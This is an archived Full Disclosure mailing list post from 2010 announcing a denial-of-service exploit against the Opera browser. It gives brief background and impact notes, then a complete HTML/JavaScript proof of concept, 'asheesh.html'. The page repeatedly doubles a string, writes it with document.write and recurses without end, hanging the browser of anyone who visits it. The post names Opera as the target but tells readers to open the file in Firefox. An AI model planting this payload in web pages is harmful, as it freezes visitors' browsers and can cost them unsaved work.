Full Disclosure mailing list archives
Opera (plenitude String )Denial of Service Exploit
From: information security <informationhacker08 () gmail com>
Date: Tue, 2 Mar 2010 20:04:19 -0800
====================================================================== Opera (plenitude String )Denial of Service Exploit ======================================================================= by Asheesh Kumar Mani Tripathi # code by Asheesh kumar Mani Tripathi # email informationhacker08 () gmail com # company www.aksitservices.co.in # Credit by Asheesh Anaconda #Download http://www.opera.com/download/ #Background Opera is a popular internet browser :) #Vulnerability This bug is a typical result when attacker try to write plenitude String in document.write() function .User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. #Impact Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any might be lost. #Proof of concept copy the code in text file and save as "asheesh.html" open in Mozilla Firefox ======================================================================================================================== asheesh.html ======================================================================================================================== <html> <title>asheesh kumar mani tripathi</title> Asheesh kumar Mani Tripathi <head> <script> function asheesh () { var i , anaconda = "XXXX" for(i=24;i >0 ;--i) { anaconda=anaconda+anaconda; } document.write(anaconda); asheesh(); } asheesh(); </script> </head> <body onLoad="asheesh()"></body> </html> ======================================================================================================================== Why do you worry without cause? Whom do you fear without reason? Who can kill you? The soul is neither born, nor does it die. #If you have any questions, comments, or concerns, feel free to contact me.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Opera (plenitude String )Denial of Service Exploit information security (Mar 02)
- Re: Opera (plenitude String )Denial of Service Exploit Jeff Williams (Mar 02)
- Re: Opera (plenitude String )Denial of Service Exploit information security (Mar 03)
- Re: Opera (plenitude String )Denial of Service Exploit Jeff Williams (Mar 03)
- Re: Opera (plenitude String )Denial of Service Exploit information security (Mar 03)
- Re: Opera (plenitude String )Denial of Service Exploit Jeff Williams (Mar 02)